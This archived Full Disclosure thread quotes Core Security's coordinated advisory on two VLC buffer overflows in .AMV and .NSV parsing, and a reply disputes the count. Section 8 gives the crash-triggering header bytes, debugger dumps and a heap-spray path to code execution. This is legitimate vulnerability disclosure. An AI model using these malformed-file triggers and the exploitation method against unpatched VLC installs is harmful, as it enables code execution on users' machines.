Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: CORE-2011-0208: VLC Vulnerabilities handling .AMV and .NSV files
From: Dan Rosenberg <dan.j.rosenberg () gmail com>
Date: Wed, 23 Mar 2011 19:21:51 -0400

Hmm...well, this is one vulnerability, not two, and it was fixed in
VLC's tree on February 12.  Still a nice find.

-Dan

On Wed, Mar 23, 2011 at 4:34 PM, CORE Security Technologies Advisories
<advisories () coresecurity com> wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

  Core Security Technologies - Corelabs Advisory
       http://corelabs.coresecurity.com/

  VLC Vulnerabilities handling .AMV and .NSV files


1. *Advisory Information*

Title: VLC Vulnerabilities handling .AMV and .NSV files
Advisory ID: CORE-2011-0208
Advisory URL:
http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files
Date published: 2011-03-23
Date of last update: 2011-03-23
Vendors contacted: VLC team
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
CVE Name: CVE-2010-3275, CVE-2010-3276


3. *Vulnerability Description*

Two vulnerabilities have been found in VLC media player [1], when
handling .AMV and .NSV file formats. These vulnerabilities can be
exploited by a remote attacker to obtain arbitrary code execution with
the privileges of the user running VLC.


4. *Vulnerable packages*

  . VLC 1.1.4
  . VLC 1.1.5
  . VLC 1.1.6
  . VLC 1.1.7
  . Older versions may be affected, but were not checked.


5. *Non-vulnerable packages*

  . VLC 1.1.8


6. *Vendor Information, Solutions and Workarounds*

These vulnerabilities are fixed in VLC version 1.1.8, which can be
downloaded from http://www.videolan.org/


7. *Credits*

These vulnerabilities were discovered and researched by Ricardo Narvaja
from Core Security Technologies. Publication was coordinated by Carlos
Sarraute.


8. *Technical Description / Proof of Concept Code*


8.1. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling AMV files
[CVE-2010-3275]*

This vulnerability was found by fuzzing different formats. In AMV files
if the offset 0x41 is changed to a value greater than 90 as shown below:

/-----
Offset(h)

00000000  52 49 46 46 00 00 00 00 41 4D 56 20 4C 49 53 54  RIFF....AMV LIST
00000010  00 00 00 00 68 64 72 6C 61 6D 76 68 38 00 00 00  ....hdrlamvh8...
00000020  24 F4 00 00 00 00 00 00 00 00 00 00 00 00 00 00  $ô..............
00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000040  A0 A0

- -----/


Then the program will crash in the following plugin:

/-----
Executable modules, item 248
Base=6D680000
Size=00017000 (94208.)
Entry=6D6810C0 libdir_1.<ModuleEntryPoint>
 Name=libdir_1
 Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll

- -----/


More precisely in this location:

/-----
6D6812A1    8B10            MOV EDX,DWORD PTR DS:[EAX]
6D6812A3    894C24 04       MOV DWORD PTR SS:[ESP+4],ECX
6D6812A7    890424          MOV DWORD PTR SS:[ESP],EAX
6D6812AA    FF92 80000000   CALL DWORD PTR DS:[EDX+80]

offset

000006A1    8B10            MOV EDX,DWORD PTR DS:[EAX]
000006A3    894C24 04       MOV DWORD PTR SS:[ESP+4],ECX
000006A7    890424          MOV DWORD PTR SS:[ESP],EAX
000006AA    FF92 80000000   CALL DWORD PTR DS:[EDX+80]

registers

EAX 3DD1255C
ECX 00000000
EDX 3032344A
EBX 3DDF9410
ESP 3F82FC04
EBP 3DD1229C
ESI 3DD1255C
EDI 3DDF90BC
EIP 6D6812AA libdir_1.6D6812AA

- -----/


When executing an appropriate heap spray in Internet explorer:

/-----
303234CA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
303234DA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
303234EA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
303234FA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
3032350A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
3032351A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
3032352A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................

- -----/


We manage to take control of the execution flow and execute our code:

/-----
0C0C0C0C    0C 0C           OR AL,0C
0C0C0C0E    0C 0C           OR AL,0C
0C0C0C10    0C 0C           OR AL,0C
0C0C0C12    0C 0C           OR AL,0C
0C0C0C14    0C 0C           OR AL,0C
0C0C0C16    0C 0C           OR AL,0C
0C0C0C18    0C 0C           OR AL,0C
0C0C0C1A    0C 0C           OR AL,0C
0C0C0C1C    0C 0C           OR AL,0C
0C0C0C1E    0C 0C           OR AL,0C
0C0C0C20    0C 0C           OR AL,0C
0C0C0C22    0C 0C           OR AL,0C
0C0C0C24    0C 0C           OR AL,0C
0C0C0C26    0C 0C           OR AL,0C

- -----/



8.2. *Vulnerability in VLC 1.1.4 to 1.1.7 when handling NSV files
[CVE-2010-3276]*

In NSV files when changing the offsets 0x0b to 0x0e as shown below:

/-----
Offset(h)

00000000  4E 53 56 73 56 50 33 31 4D 50 33 98 00 99 01 01  NSVsVP31MP3_._..

- -----/


We can make the program crash in the following plugin:

/-----
Executable modules, item 248
Base=6D680000
Size=00017000 (94208.)
Entry=6D6810C0 libdir_1.<ModuleEntryPoint>
   Name=libdir_1
   Path=C:\Program Files\VideoLAN\VLC\plugins\libdirectx_plugin.dll

- -----/


More precisely in this location:

/-----
6D6812A1    8B10            MOV EDX,DWORD PTR DS:[EAX]
6D6812A3    894C24 04       MOV DWORD PTR SS:[ESP+4],ECX
6D6812A7    890424          MOV DWORD PTR SS:[ESP],EAX
6D6812AA    FF92 80000000   CALL DWORD PTR DS:[EDX+80]

offset

000006A1    8B10            MOV EDX,DWORD PTR DS:[EAX]
000006A3    894C24 04       MOV DWORD PTR SS:[ESP+4],ECX
000006A7    890424          MOV DWORD PTR SS:[ESP],EAX
000006AA    FF92 80000000   CALL DWORD PTR DS:[EDX+80]

registers

EAX 37CE12FC ASCII "I420"
ECX 00000000
EDX 30323449
EBX 37D8F268
ESP 3865FC04
EBP 37CE103C
ESI 37CE12FC ASCII "I420"
EDI 37D8E314
EIP 6D6812AA libdirec.6D6812AA

- -----/


When executing an appropriate heap spray in Internet explorer:

/-----
303234CA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
303234DA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
303234EA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
303234FA  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
3032350A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
3032351A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
3032352A  0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................

- -----/


We make the execution continue in our code:

/-----
0C0C0C0C    0C 0C           OR AL,0C
0C0C0C0E    0C 0C           OR AL,0C
0C0C0C10    0C 0C           OR AL,0C
0C0C0C12    0C 0C           OR AL,0C
0C0C0C14    0C 0C           OR AL,0C
0C0C0C16    0C 0C           OR AL,0C
0C0C0C18    0C 0C           OR AL,0C
0C0C0C1A    0C 0C           OR AL,0C
0C0C0C1C    0C 0C           OR AL,0C
0C0C0C1E    0C 0C           OR AL,0C
0C0C0C20    0C 0C           OR AL,0C
0C0C0C22    0C 0C           OR AL,0C
0C0C0C24    0C 0C           OR AL,0C
0C0C0C26    0C 0C           OR AL,0C

- -----/



9. *Report Timeline*

. 2011-02-08:
Core Security Technologies notifies the VLC team of the vulnerabilities.
Publication date is temporarily set to February 28, 2011.

. 2011-02-08:
VLC team acknowledges notification and provides PGP keys.

. 2011-02-09:
Core sends a technical description and PoC files that trigger the
vulnerabilities.

. 2011-02-18:
Core asks the VLC team whether they could reproduce the vulnerabilities.

. 2011-02-23:
VLC team replies that fixes will be included in VLC 1.1.8, and that they
believe the issue is not exploitable.

. 2011-02-25:
Core replies that the issues have been confirmed to be exploitable, and
that the researcher has developed fully working exploits. Core offers to
reschedule the publication of its advisory to coordinate it with the
release of fixes.

. 2011-03-10:
Core requests an update on this issue, since no reply was received. Core
notes that the PoC files and exploits were tested on Windows only, and
reschedules publication to March 16, stating that the advisory will be
published as "user release" if no reply is received.

. 2011-03-10:
VLC team requests two additional weeks for the release of fixes, and
asks whether the vulnerabilities are exploitable with ASLR.

. 2011-03-14:
Core agrees to postpone publication, confirms that the bugs are
exploitable with ASLR, and requests a concrete date for the release.

. 2011-03-16:
VLC team states that they would like to release on March 23rd.

. 2011-03-18:
Core agrees with the release date.

. 2011-03-23:
Advisory CORE-2011-0208 is published.



10. *References*

[1] VLC media player http://www.videolan.org/


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and prove real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAk2KWWUACgkQyNibggitWa1ilwCgmcHE6sjoDBlD6iaSlYBAJiXA
wnEAnjC85SPOZ1+ugKtVCGl7bxswqek9
=oV7u
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault